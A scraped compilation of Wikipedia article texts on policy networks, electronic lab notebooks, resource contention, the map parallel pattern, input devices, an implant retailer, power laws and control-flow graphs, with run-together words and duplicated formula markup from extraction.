In policy network analysis, theorists complement standard rational choice arguments with the insights ofnew institutionalism. This "actor-centered institutionalism" is used to describe policy networks as structural arrangements between relatively stable sets of public and private players. Rational choice theorists identifylinksbetween network actors as channels to exchange multiple goods (f.e. knowledge, resources and information).[1]
The prescriptive literature on policy networks focuses on the phenomenon's role in constraining or enabling certain governmental action. From this viewpoint, networks are seen as central elements of the realm of policy-making at least partially defining the desirability of status quo – thus a possible target of reform initiatives.[1]The three most common network management approaches are the following: instrumental (a focus on altering dependency relation), institutional (a focus on rules, incentives and culture) and interactive (a focus on communication and negotiation).[9]
As Rhodes[1]points out, there is a long-lasting debate in the field about general theories predicting the emergence of specific networks and corresponding policy outcomes depending on specific conditions. No theories have succeeded in achieving this level of generality yet and some scholars doubt they ever will. Other debates are focusing on describing and theorizing change in policy networks. While some political scientists state that this might not be possible,[10]other scholars have made efforts towards the understanding of policy network dynamics. One example is the advocacy coalition framework, which aims to analyze the effect of commonly represented beliefs (in coalitions) on policy outcomes.[1][11]
|
https://en.wikipedia.org/wiki/Policy_network_analysis
|
Anelectronic lab notebookorelectronic laboratory notebook(ELN) is acomputer programdesigned to replace paperlaboratory notebooks. Lab notebooks in general are used byscientists,engineers, andtechniciansto documentresearch,experiments, and procedures performed in a laboratory. A lab notebook is often maintained to be alegal documentand may be used in acourt of lawasevidence. Similar to aninventor's notebook, the lab notebook is also often referred to inpatentprosecution andintellectual propertylitigation.
Electronic lab notebooks offer many benefits to the user as well as organizations; they are easier tosearchupon, simplifydata copyingandbackups, and supportcollaborationamongst many users.[1]ELNs can have fine-grained access controls, and can be more secure than their paper counterparts.[2]They also allow the direct incorporation of data from instruments, replacing the practice of printing out data to be stapled into a paper notebook.[3]
ELNs can be divided into two categories:
Solutions range from specialized programs designed from the ground up for use as an ELN, to modifications or direct use of more general programs. Examples of using more general software as an ELN include usingOpenWetWare, aMediaWikiinstall (running the same software that Wikipedia uses),WordPress,[4]or the use of general note taking software such as OneNote as an ELN.[5][3]
ELN's come in many different forms. They can be standalone programs, use a client-server model, or be entirely web-based. Some use a lab-notebook approach, others resemble a blog. ELNs are embracing artificial intelligence and LLM technology to provide scientific AI chat assistants.
A good many variations on the "ELN" acronym have appeared.[6]Differences between systems with different names are often subtle, with considerable functional overlap between them. Examples include "ERN" (Electronic Research Notebook), "ERMS" (Electronic Resource (or Research or Records) Management System (or Software) and SDMS (Scientific Data (or Document) Management System (or Software). Ultimately, these types of systems all strive to do the same thing: Capture, record, centralize and protect scientific data in a way that is highly searchable, historically accurate, and legally stringent, and which also promotes secure collaboration, greater efficiency, reduced mistakes and lowered total research costs.
A good electronic laboratory notebook should offer a secure environment to protect the integrity of both data and process, whilst also affording the flexibility to adopt new processes or changes to existing processes without recourse to further software development. The package architecture should be a modular design, so as to offer the benefit of minimizing validation costs of any subsequent changes that you may wish to make in the future as your needs change.
A good electronic laboratory notebook should be an "out of the box" solution that, as standard, has fully configurable forms to comply with the requirements of regulated analytical groups through to a sophisticated ELN for inclusion of structures, spectra, chromatograms, pictures, text, etc. where a preconfigured form is less appropriate. All data within the system may be stored in a database (e.g. MySQL, MS-SQL, Oracle) and be fully searchable. The system should enable data to be collected, stored and retrieved through any combination of forms or ELN that best meets the requirements of the user.
The application should enable secure forms to be generated that accept laboratory data input via PCs and/or laptops / palmtops, and should be directly linked to electronic devices such as laboratory balances, pH meters, etc. Networked or wireless communications should be accommodated for by the package which will allow data to be interrogated, tabulated, checked, approved, stored and archived to comply with the latest regulatory guidance and legislation. A system should also include a scheduling option for routine procedures such as equipment qualification and study related timelines. It should include configurable qualification requirements to automatically verify that instruments have been cleaned and calibrated within a specified time period, that reagents have been quality-checked and have not expired, and that workers are trained and authorized to use the equipment and perform the procedures.
The laboratory accreditation criteria found in theISO 17025standard needs to be considered for the protection and computer backup of electronic records. These criteria can be found specifically in clause 4.13.1.4 of the standard.[7]
Electronic lab notebooks used for development or research in regulated industries, such as medical devices or pharmaceuticals, are expected to comply with FDA regulations related to software validation. The purpose of the regulations is to ensure the integrity of the entries in terms of time, authorship, and content. Unlike ELNs for patent protection, FDA is not concerned with patent interference proceedings, but is concerned with avoidance of falsification. Typical provisions related to software validation are included in the medical device regulations at 21 CFR 820 (et seq.)[8]andTitle 21 CFR Part 11.[9]Essentially, the requirements are that the software has been designed and implemented to be suitable for its intended purposes. Evidence to show that this is the case is often provided by a Software Requirements Specification (SRS) setting forth the intended uses and the needs that the ELN will meet; one or more testing protocols that, when followed, demonstrate that the ELN meets the requirements of the specification and that the requirements are satisfied under worst-case conditions. Security, audit trails, prevention of unauthorized changes without substantial collusion of otherwise independent personnel (i.e., those having no interest in the content of the ELN such as independent quality unit personnel) and similar tests are fundamental. Finally, one or more reports demonstrating the results of the testing in accordance with the predefined protocols are required prior to release of the ELN software for use. If the reports show that the software failed to satisfy any of the SRS requirements, then corrective and preventive action ("CAPA") must be undertaken and documented. Such CAPA may extend to minor software revisions, or changes in architecture or major revisions. CAPA activities need to be documented as well.
Aside from the requirements to follow such steps for regulated industry, such an approach is generally a good practice in terms of development and release of any software to assure its quality and fitness for use. There are standards related to software development and testing that can be applied (see ref.).
|
https://en.wikipedia.org/wiki/Electronic_lab_notebook
|
Incomputer science,resource contentionis a conflict over access to ashared resourcesuch asrandom access memory,disk storage,cache memory, internalbusesor external network devices. A resource experiencing ongoing contention can be described asoversubscribed.
Resolving resource contention problems is one of the basic functions ofoperating systems. Various low-level mechanisms can be used to aid this, includinglocks,semaphores,mutexesandqueues. The other techniques that can be applied by the operating systems include intelligent scheduling, application mapping decisions, andpage coloring.[1][2]
Access to resources is also sometimes regulated by queuing; in the case of computing time on aCPUthe controllingalgorithmof thetaskqueue is called ascheduler.
Failure to properly resolve resource contention problems may result in a number of problems, includingdeadlock,livelock, andthrashing.
Resource contention results when multiple processes attempt to use the same shared resource. Access to memory areas is often controlled by semaphores, which allows a pathological situation called a deadlock, when differentthreadsorprocessestry to allocate resources already allocated by each other. A deadlock usually leads to a program becoming partially or completely unresponsive.
In recent years, research on the contention is focused more on the resources in thememory hierarchy, e.g., last-level caches, front-side bus, and memory socket connection.[citation needed]
Thiscomputer sciencearticle is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Resource_contention
|
Mapis anidiominparallel computingwhere a simple operation is applied to all elements of a sequence, potentially in parallel.[1]It is used to solveembarrassingly parallelproblems: those problems that can be decomposed into independent subtasks, requiring no communication/synchronization between the subtasks except ajoinorbarrierat the end.
When applying the map pattern, one formulates anelemental functionthat captures the operation to be performed on a data item that represents a part of the problem, then applies this elemental function in one or morethreads of execution,hyperthreads,SIMD lanesor onmultiple computers.
Some parallel programming systems, such asOpenMPandCilk, have language support for the map pattern in the form of aparallel for loop;[2]languages such asOpenCLandCUDAsupport elemental functions (as "kernels") at the language level. The map pattern is typically combined with other parallel design patterns. For example, map combined with category reduction gives theMapReducepattern.[3]: 106–107
|
https://en.wikipedia.org/wiki/Map_(parallel_pattern)
|
In computing, aninput deviceis a piece of equipment used to provide data and control signals to an information processing system, such as a computer or information appliance. Examples of input devices includekeyboards,computer mice,scanners, cameras,joysticks, andmicrophones.
Input devices can be categorized based on:
Akeyboardis ahuman interface devicewhich is represented as a matrix of buttons. Each button, or key, can be used to either input an alphanumeric character to a computer, or to call upon a particular function of the computer. It acts as the maintext entry interfacefor most users.[1]
Keyboards are available in many form factors, depending on the use case. Standard keyboards can be categorized by its size and number of keys, and the type of switch it employs. Other keyboards cater to specific use cases, such as anumeric keypador akeyer.
Desktop keyboards are typically large, often have full key travel distance, and features such as multimedia keys and a numeric keypad. Keyboards on laptops and tablets typically compromise on comfort to achieve a thin figure.
There are various switch technologies used in modern keyboards, such asmechanical switches(which use springs), scissor switches (usually found on a laptop keyboard), or a membrane.
Other keyboards do not have physical keys, such as avirtual keyboard, or aprojection keyboard.
Apointing deviceallows a user to input spatial data to a computer. It is commonly used as a simple and intuitive way to select items on a computer screen on agraphical user interface(GUI), either by moving amouse pointer, or, in the case of a touch screen, by physically touching the item on screen. Common pointing devices include mice, touchpads, and touch screens.[2]
Whereas mice operate by detecting their displacement on a surface, analog devices, such as3D mice, joysticks, or pointing sticks, function by reporting their angle of deflection.
Pointing devices can be classified on:
Direct input is almost necessarily absolute, but indirect input may be either absolute or relative. For example, digitizinggraphics tabletsthat do not have an embedded screen involve indirect input and sense absolute positions and are often run in an absolute input mode, but they may also be set up to simulate a relative input mode like that of atouchpad, where thestylusor puck can be lifted and repositioned.Embedded LCD tablets, which are also referred to as graphics tablet monitors, are the extension of digitizing graphics tablets. They enable users to see the real-time positions via the screen while being used.
Asensoris an input device which produces data based on physical properties.[4]
Sensors are commonly found inmobile devicesto detect their physical orientation and acceleration, but may also be found indesktop computersin the form of a thermometer used to monitor system temperature.
Some sensors can be built withMEMS, which allows them to be microscopic in size.
Some devices allow many continuousdegrees of freedomas input. These can be used as pointing devices, but are generally used in ways that don't involve pointing to a location in space, such as the control of a camera angle while in 3D applications. These kinds of devices are typically used invirtual reality systems (CAVEs), where input that registerssix degrees of freedomis required.[citation needed]
Input devices, such as buttons andjoysticks, can be combined on a single physical device that could be thought of as a composite device. Manygamingdevices have controllers like this. Technically mice are composite devices, as they both track movement and provide buttons for clicking, but composite devices are generally considered to have more than two different forms of input.
Video input devices are used to digitize images or video from the outside world into the computer. The information can be stored in a multitude of formats depending on the user's requirement.
Many video input devices use acamera sensor.
Voice input devices are used to capture sound. In some cases, an audiooutput devicecan be used as an input device, in order to capture produced sound. Audio input devices allow a user to send audio info to a computer for processing, recording, or carrying out commands. Devices such as microphones allow users to speak to the computer in order to record a voice message or navigate software. Aside from recording, audio input devices are also used withspeech recognitionsoftware.
Punched cardsandpunched tapeswere used often in the 20th century. A punched hole represented a one; its absence represented a zero. A mechanical or optical reader was used to input a punched card or tape.
|
https://en.wikipedia.org/wiki/Input_device
|
Dangerous Things[1]is aSeattle-basedcyberneticmicrochipbiohackingimplant retailer formed in 2013 by Amal Graafstra,[2]following acrowdfundingcampaign.[3]
Dangerous Things built the first personal publicly available implantableNFC compliant transponderin 2013.[4]In September 2020, Dangerous Things began another highly successful crowdfunding campaign to realize the world's first titanium encased fully bio-compatible sensing magnet, named the Titan.
This United States corporation or company article is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Dangerous_Things
|
Instatistics, apower lawis afunctional relationshipbetween two quantities, where arelative changein one quantity results in a relative change in the other quantity proportional to the change raised to a constantexponent: one quantity varies as a power of another. The change is independent of the initial size of those quantities.
For instance, the area of a square has a power law relationship with the length of its side, since if the length is doubled, the area is multiplied by 22, while if the length is tripled, the area is multiplied by 32, and so on.[1]
The distributions of a wide variety of physical, biological, and human-made phenomena approximately follow a power law over a wide range of magnitudes: these include the sizes of craters on themoonand ofsolar flares,[2]cloud sizes,[3]the foraging pattern of various species,[4]the sizes of activity patterns of neuronal populations,[5]the frequencies ofwordsin most languages, frequencies offamily names, thespecies richnessincladesof organisms,[6]the sizes ofpower outages, volcanic eruptions,[7]human judgments of stimulus intensity[8][9]and many other quantities.[10]Empirical distributions can only fit a power law for a limited range of values, because a pure power law would allow for arbitrarily large or small values.Acoustic attenuationfollows frequency power-laws within wide frequency bands for many complex media.Allometric scaling lawsfor relationships between biological variables are among the best known power-law functions in nature.
The power-law model does not obey the treasured paradigm of statistical completeness. Especially probability bounds, the suspected cause of typical bending and/or flattening phenomena in the high- and low-frequency graphical segments, are parametrically absent in the standard model.[11]
One attribute of power laws is theirscale invariance. Given a relationf(x)=ax−k{\displaystyle f(x)=ax^{-k}}, scaling the argumentx{\displaystyle x}by a constant factorc{\displaystyle c}causes only a proportionate scaling of the function itself. That is,
where∝{\displaystyle \propto }denotesdirect proportionality. That is, scaling by a constantc{\displaystyle c}simply multiplies the original power-law relation by the constantc−k{\displaystyle c^{-k}}. Thus, it follows that all power laws with a particular scaling exponent are equivalent up to constant factors, since each is simply a scaled version of the others. This behavior is what produces the linear relationship when logarithms are taken of bothf(x){\displaystyle f(x)}andx{\displaystyle x}, and the straight-line on thelog–log plotis often called thesignatureof a power law. With real data, such straightness is a necessary, but not sufficient, condition for the data following a power-law relation. In fact, there are many ways to generate finite amounts of data that mimic this signature behavior, but, in their asymptotic limit, are not true power laws.[citation needed]Thus, accurately fitting andvalidating power-lawmodels is an active area of research in statistics; see below.
A power-lawx−k{\displaystyle x^{-k}}has a well-definedmeanoverx∈[1,∞){\displaystyle x\in [1,\infty )}only ifk>2{\displaystyle k>2}, and it has a finitevarianceonly ifk>3{\displaystyle k>3}; most identified power laws in nature have exponents such that the mean is well-defined but the variance is not, implying they are capable ofblack swanbehavior.[2]This can be seen in the following thought experiment:[12]imagine a room with your friends and estimate the average monthly income in the room. Now imagine theworld's richest personentering the room, with a monthly income of about 1billionUS$. What happens to the average income in the room? Income is distributed according to a power-law known as thePareto distribution(for example, the net worth of Americans is distributed according to a power law with an exponent of 2).
On the one hand, this makes it incorrect to apply traditional statistics that are based onvarianceandstandard deviation(such asregression analysis).[13]On the other hand, this also allows for cost-efficient interventions.[12]For example, given that car exhaust is distributed according to a power-law among cars (very few cars contribute to most contamination) it would be sufficient to eliminate those very few cars from the road to reduce total exhaust substantially.[14]
The median does exist, however: for a power lawx–k, with exponentk>1{\displaystyle k>1}, it takes the value 21/(k– 1)xmin, wherexminis the minimum value for which the power law holds.[2]
The equivalence of power laws with a particular scaling exponent can have a deeper origin in the dynamical processes that generate the power-law relation. In physics, for example,phase transitionsin thermodynamic systems are associated with the emergence of power-law distributions of certain quantities, whose exponents are referred to as thecritical exponentsof the system. Diverse systems with the same critical exponents—that is, which display identical scaling behaviour as they approachcriticality—can be shown, viarenormalization grouptheory, to share the same fundamental dynamics. For instance, the behavior of water and CO2at their boiling points fall in the same universality class because they have identical critical exponents.[citation needed][clarification needed]In fact, almost all material phase transitions are described by a small set of universality classes. Similar observations have been made, though not as comprehensively, for variousself-organized criticalsystems, where the critical point of the system is anattractor. Formally, this sharing of dynamics is referred to asuniversality, and systems with precisely the same critical exponents are said to belong to the sameuniversality class.
Scientific interest in power-law relations stems partly from the ease with which certain general classes of mechanisms generate them.[15]The demonstration of a power-law relation in some data can point to specific kinds of mechanisms that might underlie the natural phenomenon in question, and can indicate a deep connection with other, seemingly unrelated systems;[16]see alsouniversalityabove. The ubiquity of power-law relations in physics is partly due todimensional constraints, while incomplex systems, power laws are often thought to be signatures of hierarchy or of specificstochastic processes. A few notable examples of power laws arePareto's lawof income distribution, structural self-similarity offractals,scaling laws in biological systems, andscaling laws in cities. Research on the origins of power-law relations, and efforts to observe and validate them in the real world, is an active topic of research in many fields of science, includingphysics,computer science,linguistics,geophysics,neuroscience,systematics,sociology,economicsand more.
However, much of the recent interest in power laws comes from the study ofprobability distributions: The distributions of a wide variety of quantities seem to follow the power-law form, at least in their upper tail (large events). The behavior of these large events connects these quantities to the study oftheory of large deviations(also calledextreme value theory), which considers the frequency of extremely rare events likestock market crashesand largenatural disasters. It is primarily in the study of statistical distributions that the name "power law" is used.
In empirical contexts, an approximation to a power-lawo(xk){\displaystyle o(x^{k})}often includes a deviation termε{\displaystyle \varepsilon }, which can represent uncertainty in the observed values (perhaps measurement or sampling errors) or provide a simple way for observations to deviate from the power-law function (perhaps for stochastic reasons):
Mathematically, a strict power law cannot be a probability distribution, but a distribution that is a truncatedpower functionis possible:p(x)=Cx−α{\displaystyle p(x)=Cx^{-\alpha }}forx>xmin{\displaystyle x>x_{\text{min}}}where the exponentα{\displaystyle \alpha }(Greek letteralpha, not to be confused with scaling factora{\displaystyle a}used above) is greater than 1 (otherwise the tail has infinite area), the minimum valuexmin{\displaystyle x_{\text{min}}}is needed otherwise the distribution has infinite area asxapproaches 0, and the constantCis a scaling factor to ensure that the total area is 1, as required by a probability distribution. More often one uses an asymptotic power law – one that is only true in the limit; seepower-law probability distributionsbelow for details. Typically the exponent falls in the range2<α<3{\displaystyle 2<\alpha <3}, though not always.[10]
More than a hundred power-law distributions have been identified in physics (e.g. sandpile avalanches), biology (e.g. species extinction and body mass), and the social sciences (e.g. city sizes and income).[17]Among them are:
A broken power law is apiecewise function, consisting of two or more power laws, combined with a threshold. For example, with two power laws:[49]
The pieces of a broken power law can be smoothly spliced together to construct a smoothly broken power law.
There are different possible ways to splice together power laws. One example is the following:[50]ln(yy0+a)=c0ln(xx0)+∑i=1nci−ci−1filn(1+(xxi)fi){\displaystyle \ln \left({\frac {y}{y_{0}}}+a\right)=c_{0}\ln \left({\frac {x}{x_{0}}}\right)+\sum _{i=1}^{n}{\frac {c_{i}-c_{i-1}}{f_{i}}}\ln \left(1+\left({\frac {x}{x_{i}}}\right)^{f_{i}}\right)}where0<x0<x1<⋯<xn{\displaystyle 0<x_{0}<x_{1}<\cdots <x_{n}}.
When the function is plotted as alog-log plotwith horizontal axis beinglnx{\displaystyle \ln x}and vertical axis beingln(y/y0+a){\displaystyle \ln(y/y_{0}+a)}, the plot is composed ofn+1{\displaystyle n+1}linear segments with slopesc0,c1,...,cn{\displaystyle c_{0},c_{1},...,c_{n}}, separated atx=x1,...,xn{\displaystyle x=x_{1},...,x_{n}}, smoothly spliced together. The size offi{\displaystyle f_{i}}determines the sharpness of splicing between segmentsi−1,i{\displaystyle i-1,i}.
A power law with an exponential cutoff is simply a power law multiplied by an exponential function:[10]
In a looser sense, a power-lawprobability distributionis a distribution whose density function (or mass function in the discrete case) has the form, for large values ofx{\displaystyle x},[52]
whereα>1{\displaystyle \alpha >1}, andL(x){\displaystyle L(x)}is aslowly varying function, which is any function that satisfieslimx→∞L(rx)/L(x)=1{\displaystyle \lim _{x\rightarrow \infty }L(r\,x)/L(x)=1}for any positive factorr{\displaystyle r}. This property ofL(x){\displaystyle L(x)}follows directly from the requirement thatp(x){\displaystyle p(x)}be asymptotically scale invariant; thus, the form ofL(x){\displaystyle L(x)}only controls the shape and finite extent of the lower tail. For instance, ifL(x){\displaystyle L(x)}is the constant function, then we have a power law that holds for all values ofx{\displaystyle x}. In many cases, it is convenient to assume a lower boundxmin{\displaystyle x_{\mathrm {min} }}from which the law holds. Combining these two cases, and wherex{\displaystyle x}is a continuous variable, the power law has the form of thePareto distribution
where the pre-factor toα−1xmin{\displaystyle {\frac {\alpha -1}{x_{\min }}}}is thenormalizing constant. We can now consider several properties of this distribution. For instance, itsmomentsare given by
which is only well defined form<α−1{\displaystyle m<\alpha -1}. That is, all momentsm≥α−1{\displaystyle m\geq \alpha -1}diverge: whenα≤2{\displaystyle \alpha \leq 2}, the average and all higher-order moments are infinite; when2<α<3{\displaystyle 2<\alpha <3}, the mean exists, but the variance and higher-order moments are infinite, etc. For finite-size samples drawn from such distribution, this behavior implies that thecentral momentestimators (like the mean and the variance) for diverging moments will never converge – as more data is accumulated, they continue to grow. These power-law probability distributions are also called Pareto-type distributions, distributions with Pareto tails, or distributions with regularly varying tails.
A modification, which does not satisfy the general form above, with an exponential cutoff,[10]is
In this distribution, the exponential decay terme−λx{\displaystyle \mathrm {e} ^{-\lambda x}}eventually overwhelms the power-law behavior at very large values ofx{\displaystyle x}. This distribution does not scale[further explanation needed]and is thus not asymptotically as a power law; however, it does approximately scale over a finite region before the cutoff. The pure form above is a subset of this family, withλ=0{\displaystyle \lambda =0}. This distribution is a common alternative to the asymptotic power-law distribution because it naturally captures finite-size effects.
TheTweedie distributionsare a family of statistical models characterized byclosureunder additive and reproductive convolution as well as under scale transformation. Consequently, these models all express a power-law relationship between the variance and the mean. These models have a fundamental role as foci of mathematicalconvergencesimilar to the role that thenormal distributionhas as a focus in thecentral limit theorem. This convergence effect explains why the variance-to-mean power law manifests so widely in natural processes, as withTaylor's lawin ecology and with fluctuation scaling[53]in physics. It can also be shown that this variance-to-mean power law, when demonstrated by themethod of expanding bins, implies the presence of 1/fnoise and that 1/fnoise can arise as a consequence of this Tweedie convergence effect.[54]
Although more sophisticated and robust methods have been proposed, the most frequently used graphical methods of identifying power-law probability distributions using random samples are Pareto quantile-quantile plots (or ParetoQ–Q plots),[citation needed]mean residual life plots[55][56]andlog–log plots. Another, more robust graphical method uses bundles of residual quantile functions.[57](Please keep in mind that power-law distributions are also called Pareto-type distributions.) It is assumed here that a random sample is obtained from a probability distribution, and that we want to know if the tail of the distribution follows a power law (in other words, we want to know if the distribution has a "Pareto tail"). Here, the random sample is called "the data".
Pareto Q–Q plots compare thequantilesof the log-transformed data to the corresponding quantiles of an exponential distribution with mean 1 (or to the quantiles of a standard Pareto distribution) by plotting the former versus the latter. If the resultant scatterplot suggests that the plotted pointsasymptotically convergeto a straight line, then a power-law distribution should be suspected. A limitation of Pareto Q–Q plots is that they behave poorly when the tail indexα{\displaystyle \alpha }(also called Pareto index) is close to 0, because Pareto Q–Q plots are not designed to identify distributions with slowly varying tails.[57]
On the other hand, in its version for identifying power-law probability distributions, the mean residual life plot consists of first log-transforming the data, and then plotting the average of those log-transformed data that are higher than thei-th order statistic versus thei-th order statistic, fori= 1, ...,n, where n is the size of the random sample. If the resultant scatterplot suggests that the plotted points tend to stabilize about a horizontal straight line, then a power-law distribution should be suspected. Since the mean residual life plot is very sensitive to outliers (it is not robust), it usually produces plots that are difficult to interpret; for this reason, such plots are usually called Hill horror plots.[58]
Log–log plotsare an alternative way of graphically examining the tail of a distribution using a random sample. Taking the logarithm of a power law of the formf(x)=axk{\displaystyle f(x)=ax^{k}}results in:[59]
which forms a straight line with slopek{\displaystyle k}on a log-log scale. Caution has to be exercised however as a log–log plot is necessary but insufficient evidence for a power law relationship, as many non power-law distributions will appear as straight lines on a log–log plot.[10][60]This method consists of plotting the logarithm of an estimator of the probability that a particular number of the distribution occurs versus the logarithm of that particular number. Usually, this estimator is the proportion of times that the number occurs in the data set. If the points in the plot tend to converge to a straight line for large numbers in the x axis, then the researcher concludes that the distribution has a power-law tail. Examples of the application of these types of plot have been published.[61]A disadvantage of these plots is that, in order for them to provide reliable results, they require huge amounts of data. In addition, they are appropriate only for discrete (or grouped) data.
Another graphical method for the identification of power-law probability distributions using random samples has been proposed.[57]This methodology consists of plotting abundle for the log-transformed sample. Originally proposed as a tool to explore the existence of moments and the moment generation function using random samples, the bundle methodology is based on residualquantile functions(RQFs), also called residual percentile functions,[62][63][64][65][66][67][68]which provide a full characterization of the tail behavior of many well-known probability distributions, including power-law distributions, distributions with other types of heavy tails, and even non-heavy-tailed distributions. Bundle plots do not have the disadvantages of Pareto Q–Q plots, mean residual life plots and log–log plots mentioned above (they are robust to outliers, allow visually identifying power laws with small values ofα{\displaystyle \alpha }, and do not demand the collection of much data).[citation needed]In addition, other types of tail behavior can be identified using bundle plots.
In general, power-law distributions are plotted ondoubly logarithmic axes, which emphasizes the upper tail region. The most convenient way to do this is via the (complementary)cumulative distribution(ccdf) that is, thesurvival function,P(x)=Pr(X>x){\displaystyle P(x)=\mathrm {Pr} (X>x)},
The cdf is also a power-law function, but with a smaller scaling exponent. For data, an equivalent form of the cdf is the rank-frequency approach, in which we first sort then{\displaystyle n}observed values in ascending order, and plot them against the vector[1,n−1n,n−2n,…,1n]{\displaystyle \left[1,{\frac {n-1}{n}},{\frac {n-2}{n}},\dots ,{\frac {1}{n}}\right]}.
Although it can be convenient to log-bin the data, or otherwise smooth the probability density (mass) function directly, these methods introduce an implicit bias in the representation of the data, and thus should be avoided.[10][69]The survival function, on the other hand, is more robust to (but not without) such biases in the data and preserves the linear signature on doubly logarithmic axes. Though a survival function representation is favored over that of the pdf while fitting a power law to the data with the linear least square method, it is not devoid of mathematical inaccuracy. Thus, while estimating exponents of a power law distribution, maximum likelihood estimator is recommended.
There are many ways of estimating the value of the scaling exponent for a power-law tail, however not all of them yieldunbiased and consistent answers. Some of the most reliable techniques are often based on the method ofmaximum likelihood. Alternative methods are often based on making a linear regression on either the log–log probability, the log–log cumulative distribution function, or on log-binned data, but these approaches should be avoided as they can all lead to highly biased estimates of the scaling exponent.[10]
For real-valued,independent and identically distributeddata, we fit a power-law distribution of the form
to the datax≥xmin{\displaystyle x\geq x_{\min }}, where the coefficientα−1xmin{\displaystyle {\frac {\alpha -1}{x_{\min }}}}is included to ensure that the distribution isnormalized. Given a choice forxmin{\displaystyle x_{\min }}, the log likelihood function becomes:
The maximum of this likelihood is found by differentiating with respect to parameterα{\displaystyle \alpha }, setting the result equal to zero. Upon rearrangement, this yields the estimator equation:
where{xi}{\displaystyle \{x_{i}\}}are then{\displaystyle n}data pointsxi≥xmin{\displaystyle x_{i}\geq x_{\min }}.[2][70]This estimator exhibits a small finite sample-size bias of orderO(n−1){\displaystyle O(n^{-1})}, which is small whenn> 100. Further, the standard error of the estimate isσ=α^−1n+O(n−1){\displaystyle \sigma ={\frac {{\hat {\alpha }}-1}{\sqrt {n}}}+O(n^{-1})}. This estimator is equivalent to the popular[citation needed]Hill estimatorfromquantitative financeandextreme value theory.[citation needed]
For a set ofninteger-valued data points{xi}{\displaystyle \{x_{i}\}}, again where eachxi≥xmin{\displaystyle x_{i}\geq x_{\min }}, the maximum likelihood exponent is the solution to the transcendental equation
whereζ(α,xmin){\displaystyle \zeta (\alpha ,x_{\mathrm {min} })}is theincomplete zeta function. The uncertainty in this estimate follows the same formula as for the continuous equation. However, the two equations forα^{\displaystyle {\hat {\alpha }}}are not equivalent, and the continuous version should not be applied to discrete data, nor vice versa.
Further, both of these estimators require the choice ofxmin{\displaystyle x_{\min }}. For functions with a non-trivialL(x){\displaystyle L(x)}function, choosingxmin{\displaystyle x_{\min }}too small produces a significant bias inα^{\displaystyle {\hat {\alpha }}}, while choosing it too large increases the uncertainty inα^{\displaystyle {\hat {\alpha }}}, and reduces thestatistical powerof our model. In general, the best choice ofxmin{\displaystyle x_{\min }}depends strongly on the particular form of the lower tail, represented byL(x){\displaystyle L(x)}above.
More about these methods, and the conditions under which they can be used, can be found in .[10]Further, this comprehensive review article providesusable code(Matlab, Python, R and C++) for estimation and testing routines for power-law distributions.
Another method for the estimation of the power-law exponent, which does not assumeindependent and identically distributed(iid) data, uses the minimization of theKolmogorov–Smirnov statistic,D{\displaystyle D}, between the cumulative distribution functions of the data and the power law:
with
wherePemp(x){\displaystyle P_{\mathrm {emp} }(x)}andPα(x){\displaystyle P_{\alpha }(x)}denote the cdfs of the data and the power law with exponentα{\displaystyle \alpha }, respectively. As this method does not assume iid data, it provides an alternative way to determine the power-law exponent for data sets in which the temporal correlation can not be ignored.[5]
This criterion[71]can be applied for the estimation of power-law exponent in the case of scale-free distributions and provides a more convergent estimate than the maximum likelihood method. It has been applied to study probability distributions of fracture apertures. In some contexts the probability distribution is described, not by thecumulative distribution function, by thecumulative frequencyof a propertyX, defined as the number of elements per meter (or area unit, second etc.) for whichX>xapplies, wherexis a variable real number. As an example,[citation needed]the cumulative distribution of the fracture aperture,X, for a sample ofNelements is defined as 'the number of fractures per meter having aperture greater thanx. Use of cumulative frequency has some advantages, e.g. it allows one to put on the same diagram data gathered from sample lines of different lengths at different scales (e.g. from outcrop and from microscope).
Although power-law relations are attractive for many theoretical reasons, demonstrating that data does indeed follow a power-law relation requires more than simply fitting a particular model to the data.[34]This is important for understanding the mechanism that gives rise to the distribution: superficially similar distributions may arise for significantly different reasons, and different models yield different predictions, such as extrapolation.
For example,log-normal distributionsare often mistaken for power-law distributions:[72]a data set drawn from a lognormal distribution will be approximately linear for large values (corresponding to the upper tail of the lognormal being close to a power law)[clarification needed], but for small values the lognormal will drop off significantly (bowing down), corresponding to the lower tail of the lognormal being small (there are very few small values, rather than many small values in a power law).[citation needed]
For example,Gibrat's lawabout proportional growth processes produce distributions that are lognormal, although their log–log plots look linear over a limited range. An explanation of this is that although the logarithm of thelognormal density functionis quadratic inlog(x), yielding a "bowed" shape in a log–log plot, if the quadratic term is small relative to the linear term then the result can appear almost linear, and the lognormal behavior is only visible when the quadratic term dominates, which may require significantly more data. Therefore, a log–log plot that is slightly "bowed" downwards can reflect a log-normal distribution – not a power law.
In general, many alternative functional forms can appear to follow a power-law form for some extent.[73]Stumpf & Porter (2012)proposed plotting the empirical cumulative distribution function in the log-log domain and claimed that a candidate power-law should cover at least two orders of magnitude.[74]Also, researchers usually have to face the problem of deciding whether or not a real-world probability distribution follows a power law. As a solution to this problem, Diaz[57]proposed a graphical methodology based on random samples that allow visually discerning between different types of tail behavior. This methodology uses bundles of residual quantile functions, also called percentile residual life functions, which characterize many different types of distribution tails, including both heavy and non-heavy tails. However,Stumpf & Porter (2012)claimed the need for both a statistical and a theoretical background in order to support a power-law in the underlying mechanism driving the data generating process.[74]
One method to validate a power-law relation tests many orthogonal predictions of a particular generative mechanism against data. Simply fitting a power-law relation to a particular kind of data is not considered a rational approach. As such, the validation of power-law claims remains a very active field of research in many areas of modern science.[10]
Notes
Bibliography
|
https://en.wikipedia.org/wiki/Power_law
|
Incomputer science, acontrol-flow graph(CFG) is arepresentation, usinggraphnotation, of all paths that might be traversed through aprogramduring itsexecution. The control-flow graph was conceived byFrances E. Allen,[1]who noted thatReese T. Prosserusedboolean connectivity matricesfor flow analysis before.[2]
The CFG is essential to manycompiler optimizationsandstatic-analysistools.
In a control-flow graph eachnodein thegraphrepresents abasic block, i.e. a straight-line sequence of code with a single entry point and a single exit point, where no branches or jumps occur within the block. Basic blocks start with jump targets and end with jumps or branch instructions. Directededgesare used to represent jumps in thecontrol flow. There are, in most presentations, two specially designated blocks: theentry block, through which control enters into the flow graph, and theexit block, through which all control flow leaves.[3]
Because of its construction procedure, in a CFG, every edge A→B has the property that:
